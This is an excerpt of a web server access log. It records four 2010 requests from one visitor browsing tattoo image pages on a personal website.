86.141.250.224 - - [20/Apr/2010:07:53:13 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
86.141.250.224 - - [20/Apr/2010:07:53:22 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
86.141.250.224 - - [20/Apr/2010:07:53:22 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
86.141.250.224 - - [20/Apr/2010:07:53:22 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
